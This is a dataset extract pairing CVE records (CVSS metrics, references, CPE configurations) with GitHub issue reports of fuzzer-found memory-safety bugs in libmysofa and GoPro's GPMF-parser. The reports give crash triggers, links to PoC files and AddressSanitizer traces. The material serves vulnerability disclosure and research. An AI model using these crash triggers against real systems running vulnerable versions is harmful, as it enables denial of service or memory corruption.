cve_id
stringlengths
13
16
cve_published
stringdate
2019-01-01 16:29:00
2025-02-25 20:15:37
cve_descriptions
stringlengths
34
2.6k
cve_metrics
dict
cve_references
listlengths
1
281
cve_configurations
listlengths
1
70
cve_cwe_list
listlengths
1
1
cve_primary_cwe
stringclasses
164 values
url
stringlengths
36
97
cve_tags
listlengths
1
5
domain
stringclasses
1 value
issue_owner_repo
listlengths
2
2
issue_body
stringlengths
0
198k
issue_title
stringlengths
1
335
issue_comments_url
stringlengths
55
116
issue_comments_count
int64
0
338
issue_created_at
stringdate
2012-06-06 09:34:24
2025-04-02 09:37:20
issue_updated_at
stringdate
2014-04-01 20:16:21
2025-06-16 12:26:58
issue_html_url
stringlengths
36
97
issue_github_id
int64
4.93M
2.97B
issue_number
int64
1
199k
__index_level_0__
int64
0
6.55k
CVE-2019-20063
2019-12-29T20:15:28.080
hdf/dataobject.c in libmysofa before 0.8 has an uninitialized use of memory, as demonstrated by mysofa2json.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/hoene/libmysofa/compare/v0.7...v0.8" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/hoene/libmysofa/issues/67" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/hoene/libmysofa/compare/v0.7...v0.8" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/hoene/libmysofa/issues/67" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:symonics:libmysofa:*:*:*:*:*:*:*:*", "matchCriteriaId": "06D58760-D7CA-4E2A-A94B-43E49DCA63C4", "versionEndExcluding": "0.8", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "665" ]
665
https://github.com/hoene/libmysofa/issues/67
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "hoene", "libmysofa" ]
There is an uninitialized use in mysofa2json, the bug is found in git commit 3dba53f9c14795b109577519a0df2e25e15fcd6a. To trigger the bug, after compiling the target: valgrind ./mysofa2json test-input. PoC input is attached(I have to change the suffix of input to zip because of github's upload regulation, but this input in generated by fuzzer. [input.zip](https://github.com/hoene/libmysofa/files/3537011/input.zip) )
Uninitialized use found in mysofa2json[bug]
https://api.github.com/repos/hoene/libmysofa/issues/67/comments
2
2019-08-24T08:52:47Z
2019-08-29T16:49:47Z
https://github.com/hoene/libmysofa/issues/67
484,795,542
67
943
CVE-2019-20086
2019-12-30T04:15:10.750
GoPro GPMF-parser 1.2.3 has a heap-based buffer over-read in GPMF_Next in GPMF_parser.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gopro/gpmf-parser/issues/74" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gopro/gpmf-parser/issues/74" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gopro:gpmf-parser:1.2.3:*:*:*:*:*:*:*", "matchCriteriaId": "C4628685-F6D8-4FF2-9868-1CA7572DD943", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/gopro/gpmf-parser/issues/74
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gopro", "gpmf-parser" ]
Tested in Ubuntu 19.04, 64bit, master(ceb3815) compiled by gcc -g -fsanitize=address Triggered by $ gpmf-parse $POC POC file [poc0.zip](https://github.com/gopro/gpmf-parser/files/3727762/poc0.zip) ``` root@ubuntu:/home/tim/gpmf-parser-asan/build# ./gpmf-parser ../crashes/karma.mp4-out_of_bound-idx\:0x24-0x0 STRM of ACCL of type s with 196 samples -- 3 elements per sample STRM of GYRO of type s with 392 samples -- 3 elements per sample STRM of ISOG of type f with 29 samples STRM of SHUT of type f with 29 samples STRM of FWVS of type c with 8 samples STRM of KBAT of type lLlsSSSSSSSBBBb with 1 sample -- 15 elements per sample STRM of GPRI of type JlllSSSSBB with 4 samples -- 10 elements per sample STRM of ATTD of type LffffffB with 4 samples -- 8 elements per sample STRM of GLPI of type LllllsssS with 4 samples -- 9 elements per sample STRM of VFRH of type ffffsS with 4 samples -- 6 elements per sample STRM of SYST of type JJ with 1 sample -- 2 elements per sample STRM of BPOS of type lllfffff with 2 samples -- 8 elements per sample STRM of ATTR of type Jffff with 4 samples -- 5 elements per sample STRM of SIMU of type Lsssssssss with 4 samples -- 10 elements per sample STRM of ESCS of type JSSSSSSSSssssSSSSSSSSSSSSSSSSB with 1 sample -- 30 elements per sample STRM of LNED of type Lffffff with 4 samples -- 7 elements per sample STRM of CYTS of type LLLLLfffBB with 4 samples -- 10 elements per sample STRM of CSEN of type LffffffLLLL with 4 samples -- 11 elements per sample MP4 Payload time 0.000 to 1.001 seconds GPRI 145.912s, 33.125deg, -117.331deg, 15.445m, 0.250m, 0.420m, 0.590m/s, 334.350deg, 3.000, 20.000, GPRI 146.312s, 33.125deg, -117.331deg, 15.367m, 0.250m, 0.420m, 1.240m/s, 325.640deg, 3.000, 20.000, GPRI 146.413s, 33.125deg, -117.331deg, 15.363m, 0.250m, 0.420m, 1.500m/s, 328.710deg, 3.000, 20.000, GPRI 146.710s, 33.125deg, -117.331deg, 15.331m, 0.250m, 0.420m, 2.510m/s, 330.990deg, 3.000, 20.000, ACCL sampling rate = 192.549209 Hz (from -0.135230 to 12.313536) GYRO sampling rate = 385.114885 Hz (from -0.136323 to 12.314507) ISOG sampling rate = 29.047875 Hz (from -0.113870 to 12.313889) SHUT sampling rate = 29.047875 Hz (from -0.113870 to 12.313889) FWVS sampling rate = 7.728535 Hz (from -0.159250 to 12.262250) KBAT sampling rate = 0.966067 Hz (from -0.159250 to 12.262250) GPRI sampling rate = 3.803888 Hz (from -0.050556 to 12.305222) ATTD sampling rate = 3.803888 Hz (from -0.050556 to 12.305222) GLPI sampling rate = 3.803888 Hz (from -0.050556 to 12.305222) VFRH sampling rate = 3.803888 Hz (from -0.050556 to 12.305222) SYST sampling rate = 0.966067 Hz (from -0.159250 to 12.262250) BPOS sampling rate = 0.905688 Hz (from -0.806867 to 12.442733) ATTR sampling rate = 3.803888 Hz (from -0.050556 to 12.305222) SIMU sampling rate = 3.803888 Hz (from -0.050556 to 12.305222) ESCS sampling rate = 0.966067 Hz (from -0.159250 to 12.262250) SCPR sampling rate = 0.490026 Hz (from 0.413947 to 12.658188) LNED sampling rate = 3.803888 Hz (from -0.050556 to 12.305222) CYTS sampling rate = 3.864268 Hz (from -0.159250 to 12.262250) CSEN sampling rate = 3.781932 Hz (from -0.111868 to 12.315642) ================================================================= ==63528==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61f000000c6c at pc 0x5601cc3c88fa bp 0x7fff24d2cb30 sp 0x7fff24d2cb20 READ of size 4 at 0x61f000000c6c thread T0 #0 0x5601cc3c88f9 in GPMF_Next /home/tim/gpmf-parser-asan/GPMF_parser.c:300 #1 0x5601cc3c9163 in GPMF_FindNext /home/tim/gpmf-parser-asan/GPMF_parser.c:344 #2 0x5601cc3ee290 in main /home/tim/gpmf-parser-asan/demo/GPMF_demo.c:245 #3 0x7f3d5aad3b6a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x26b6a) #4 0x5601cc3c6299 in _start (/home/tim/gpmf-parser-asan/build/gpmf-parser+0x2299) 0x61f000000c6d is located 0 bytes to the right of 3053-byte region [0x61f000000080,0x61f000000c6d) allocated by thread T0 here: #0 0x7f3d5ada487e in __interceptor_realloc (/lib/x86_64-linux-gnu/libasan.so.5+0x10c87e) #1 0x5601cc3ee6f9 in GetPayload /home/tim/gpmf-parser-asan/demo/GPMF_mp4reader.c:64 #2 0x5601cc3ed611 in main /home/tim/gpmf-parser-asan/demo/GPMF_demo.c:102 #3 0x7f3d5aad3b6a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x26b6a) SUMMARY: AddressSanitizer: heap-buffer-overflow /home/tim/gpmf-parser-asan/GPMF_parser.c:300 in GPMF_Next Shadow bytes around the buggy address: 0x0c3e7fff8130: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c3e7fff8140: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c3e7fff8150: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c3e7fff8160: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c3e7fff8170: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c3e7fff8180: 00 00 00 00 00 00 00 00 00 00 00 00 00[05]fa fa 0x0c3e7fff8190: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c3e7fff81a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c3e7fff81b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c3e7fff81c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c3e7fff81d0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==63528==ABORTING ```
heap overflow in GPMF_Next GPMF_parser.c:300
https://api.github.com/repos/gopro/gpmf-parser/issues/74/comments
5
2019-10-15T07:06:48Z
2019-11-18T23:37:17Z
https://github.com/gopro/gpmf-parser/issues/74
507,049,927
74
944
CVE-2019-20087
2019-12-30T04:15:10.813
GoPro GPMF-parser 1.2.3 has a heap-based buffer over-read in GPMF_seekToSamples in GPMF-parse.c for the "matching tags" feature.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gopro/gpmf-parser/issues/76" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gopro/gpmf-parser/issues/76" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gopro:gpmf-parser:1.2.3:*:*:*:*:*:*:*", "matchCriteriaId": "C4628685-F6D8-4FF2-9868-1CA7572DD943", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/gopro/gpmf-parser/issues/76
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gopro", "gpmf-parser" ]
Tested in Ubuntu 19.04, 64bit, master(ceb3815) compiled by gcc -g -fsanitize=address Triggered by $ gpmf-parse $POC POC [poc2.zip](https://github.com/gopro/gpmf-parser/files/3727794/poc2.zip) ``` root@ubuntu:/home/tim/gpmf-parser-asan/build# ./gpmf-parser crashes/karma.mp4-out_of_bound-idx\:0x38-0x2 STRM of ACCL of type s with 196 samples -- 3 elements per sample STRM of GYRO of type s with 392 samples -- 3 elements per sample STRM of ISOG of type f with 29 samples STRM of SHUT of type f with 29 samples STRM of FWVS of type c with 8 samples STRM of KBAT of type lLlsSSSSSSSBBBb with 1 sample -- 15 elements per sample STRM of GPRI of type JlllSSSSBB with 4 samples -- 10 elements per sample STRM of ATTD of type LffffffB with 4 samples -- 8 elements per sample STRM of GLPI of type LllllsssS with 4 samples -- 9 elements per sample STRM of VFRH of type ffffsS with 4 samples -- 6 elements per sample STRM of SYST of type JJ with 1 sample -- 2 elements per sample STRM of BPOS of type lllfffff with 2 samples -- 8 elements per sample STRM of ATTR of type Jffff with 4 samples -- 5 elements per sample STRM of SIMU of type Lsssssssss with 4 samples -- 10 elements per sample STRM of ESCS of type JSSSSSSSSssssSSSSSSSSSSSSSSSSB with 1 sample -- 30 elements per sample STRM of LNED of type Lffffff with 4 samples -- 7 elements per sample STRM of CYTS of type LLLLLfffBB with 4 samples -- 10 elements per sample STRM of CSEN of type LffffffLLLL with 4 samples -- 11 elements per sample MP4 Payload time 0.000 to 1.001 seconds GPRI 145.912s, 33.125deg, -117.331deg, 15.445m, 0.250m, 0.420m, 0.590m/s, 334.350deg, 3.000, 20.000, GPRI 146.312s, 33.125deg, -117.331deg, 15.367m, 0.250m, 0.420m, 1.240m/s, 325.640deg, 3.000, 20.000, GPRI 146.413s, 33.125deg, -117.331deg, 15.363m, 0.250m, 0.420m, 1.500m/s, 328.710deg, 3.000, 20.000, GPRI 146.710s, 33.125deg, -117.331deg, 15.331m, 0.250m, 0.420m, 2.510m/s, 330.990deg, 3.000, 20.000, ACCL sampling rate = 192.549209 Hz (from -0.135230 to 12.313536) GYRO sampling rate = 385.114885 Hz (from -0.136323 to 12.314507) ISOG sampling rate = 29.047875 Hz (from -0.113870 to 12.313889) SHUT sampling rate = 29.047875 Hz (from -0.113870 to 12.313889) FWVS sampling rate = 7.728535 Hz (from -0.159250 to 12.262250) KBAT sampling rate = 0.966067 Hz (from -0.159250 to 12.262250) GPRI sampling rate = 3.803888 Hz (from -0.050556 to 12.305222) ATTD sampling rate = 3.803888 Hz (from -0.050556 to 12.305222) GLPI sampling rate = 3.803888 Hz (from -0.050556 to 12.305222) VFRH sampling rate = 3.803888 Hz (from -0.050556 to 12.305222) SYST sampling rate = 0.966067 Hz (from -0.159250 to 12.262250) BPOS sampling rate = 0.905688 Hz (from -0.806867 to 12.442733) ATTR sampling rate = 3.803888 Hz (from -0.050556 to 12.305222) SIMU sampling rate = 3.803888 Hz (from -0.050556 to 12.305222) ESCS sampling rate = 0.966067 Hz (from -0.159250 to 12.262250) SCPR sampling rate = 0.490026 Hz (from 0.413947 to 12.658188) LNED sampling rate = 3.803888 Hz (from -0.050556 to 12.305222) CYTS sampling rate = 3.864268 Hz (from -0.159250 to 12.262250) ================================================================= ==64501==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61f000000c64 at pc 0x564b1a8f8bc0 bp 0x7fff67f01810 sp 0x7fff67f01800 READ of size 4 at 0x61f000000c64 thread T0 #0 0x564b1a8f8bbf in GPMF_SeekToSamples /home/tim/gpmf-parser-asan/GPMF_parser.c:477 #1 0x564b1a91d0ce in main /home/tim/gpmf-parser-asan/demo/GPMF_demo.c:247 #2 0x7f5828a4db6a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x26b6a) #3 0x564b1a8f5299 in _start (/home/tim/gpmf-parser-asan/build/gpmf-parser+0x2299) 0x61f000000c64 is located 0 bytes to the right of 3044-byte region [0x61f000000080,0x61f000000c64) allocated by thread T0 here: #0 0x7f5828d1e87e in __interceptor_realloc (/lib/x86_64-linux-gnu/libasan.so.5+0x10c87e) #1 0x564b1a91d6f9 in GetPayload /home/tim/gpmf-parser-asan/demo/GPMF_mp4reader.c:64 #2 0x564b1a91c611 in main /home/tim/gpmf-parser-asan/demo/GPMF_demo.c:102 #3 0x7f5828a4db6a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x26b6a) SUMMARY: AddressSanitizer: heap-buffer-overflow /home/tim/gpmf-parser-asan/GPMF_parser.c:477 in GPMF_SeekToSamples Shadow bytes around the buggy address: 0x0c3e7fff8130: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c3e7fff8140: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c3e7fff8150: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c3e7fff8160: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c3e7fff8170: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c3e7fff8180: 00 00 00 00 00 00 00 00 00 00 00 00[04]fa fa fa 0x0c3e7fff8190: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c3e7fff81a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c3e7fff81b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c3e7fff81c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c3e7fff81d0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==64501==ABORTING ```
heapoverflow in GPMF_seekToSamples GPMF-parse.c:477
https://api.github.com/repos/gopro/gpmf-parser/issues/76/comments
3
2019-10-15T07:16:17Z
2019-11-18T23:37:59Z
https://github.com/gopro/gpmf-parser/issues/76
507,054,018
76
945
CVE-2019-20088
2019-12-30T04:15:10.890
GoPro GPMF-parser 1.2.3 has a heap-based buffer over-read in GetPayload in GPMF_mp4reader.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gopro/gpmf-parser/issues/77" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gopro/gpmf-parser/issues/77" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gopro:gpmf-parser:1.2.3:*:*:*:*:*:*:*", "matchCriteriaId": "C4628685-F6D8-4FF2-9868-1CA7572DD943", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/gopro/gpmf-parser/issues/77
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gopro", "gpmf-parser" ]
Tested in Ubuntu 19.04, 64bit, master(ceb3815) compiled by gcc -g -fsanitize=address Triggered by $ gpmf-parse $POC POC [poc3.zip](https://github.com/gopro/gpmf-parser/files/3727813/poc3.zip) ``` root@ubuntu:/home/tim/gpmf-parser-asan/build# ./gpmf-parser crashes/karma.mp4-out_of_bound-idx\:0x749-0x3 STRM of ACCL of type s with 196 samples -- 3 elements per sample STRM of GYRO of type s with 392 samples -- 3 elements per sample STRM of ISOG of type f with 29 samples STRM of SHUT of type f with 29 samples STRM of FWVS of type c with 8 samples STRM of KBAT of type lLlsSSSSSSSBBBb with 1 sample -- 15 elements per sample STRM of GPRI of type JlllSSSSBB with 4 samples -- 10 elements per sample STRM of ATTD of type LffffffB with 4 samples -- 8 elements per sample STRM of GLPI of type LllllsssS with 4 samples -- 9 elements per sample STRM of VFRH of type ffffsS with 4 samples -- 6 elements per sample STRM of SYST of type JJ with 1 sample -- 2 elements per sample STRM of BPOS of type lllfffff with 2 samples -- 8 elements per sample STRM of ATTR of type Jffff with 4 samples -- 5 elements per sample STRM of SIMU of type Lsssssssss with 4 samples -- 10 elements per sample STRM of ESCS of type JSSSSSSSSssssSSSSSSSSSSSSSSSSB with 1 sample -- 30 elements per sample STRM of LNED of type Lffffff with 4 samples -- 7 elements per sample STRM of CYTS of type LLLLLfffBB with 4 samples -- 10 elements per sample STRM of CSEN of type LffffffLLLL with 4 samples -- 11 elements per sample MP4 Payload time 0.000 to 1.001 seconds GPRI 145.912s, 33.125deg, -117.331deg, 15.445m, 0.250m, 0.420m, 0.590m/s, 334.350deg, 3.000, 20.000, GPRI 146.312s, 33.125deg, -117.331deg, 15.367m, 0.250m, 0.420m, 1.240m/s, 325.640deg, 3.000, 20.000, GPRI 146.413s, 33.125deg, -117.331deg, 15.363m, 0.250m, 0.420m, 1.500m/s, 328.710deg, 3.000, 20.000, GPRI 146.710s, 33.125deg, -117.331deg, 15.331m, 0.250m, 0.420m, 2.510m/s, 330.990deg, 3.000, 20.000, ================================================================= ==64725==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x604000000040 at pc 0x561601a2863b bp 0x7ffe832b1740 sp 0x7ffe832b1730 READ of size 4 at 0x604000000040 thread T0 #0 0x561601a2863a in GetPayload /home/tim/gpmf-parser-asan/demo/GPMF_mp4reader.c:62 #1 0x561601a27611 in main /home/tim/gpmf-parser-asan/demo/GPMF_demo.c:102 #2 0x7f3f04b53b6a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x26b6a) #3 0x561601a00299 in _start (/home/tim/gpmf-parser-asan/build/gpmf-parser+0x2299) 0x604000000040 is located 0 bytes to the right of 48-byte region [0x604000000010,0x604000000040) allocated by thread T0 here: #0 0x7f3f04e24448 in malloc (/lib/x86_64-linux-gnu/libasan.so.5+0x10c448) #1 0x561601a2be95 in OpenMP4Source /home/tim/gpmf-parser-asan/demo/GPMF_mp4reader.c:386 #2 0x561601a2738c in main /home/tim/gpmf-parser-asan/demo/GPMF_demo.c:48 #3 0x7f3f04b53b6a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x26b6a) SUMMARY: AddressSanitizer: heap-buffer-overflow /home/tim/gpmf-parser-asan/demo/GPMF_mp4reader.c:62 in GetPayload Shadow bytes around the buggy address: 0x0c087fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c087fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c087fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c087fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c087fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c087fff8000: fa fa 00 00 00 00 00 00[fa]fa fa fa fa fa fa fa 0x0c087fff8010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==64725==ABORTING ```
heap overflow in GetPayload GPMF_mp4reader.c:62
https://api.github.com/repos/gopro/gpmf-parser/issues/77/comments
3
2019-10-15T07:21:55Z
2019-11-18T23:38:23Z
https://github.com/gopro/gpmf-parser/issues/77
507,056,444
77
946
CVE-2019-20089
2019-12-30T04:15:10.967
GoPro GPMF-parser 1.2.3 has an heap-based buffer over-read in GPMF_SeekToSamples in GPMF_parse.c for the size calculation.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
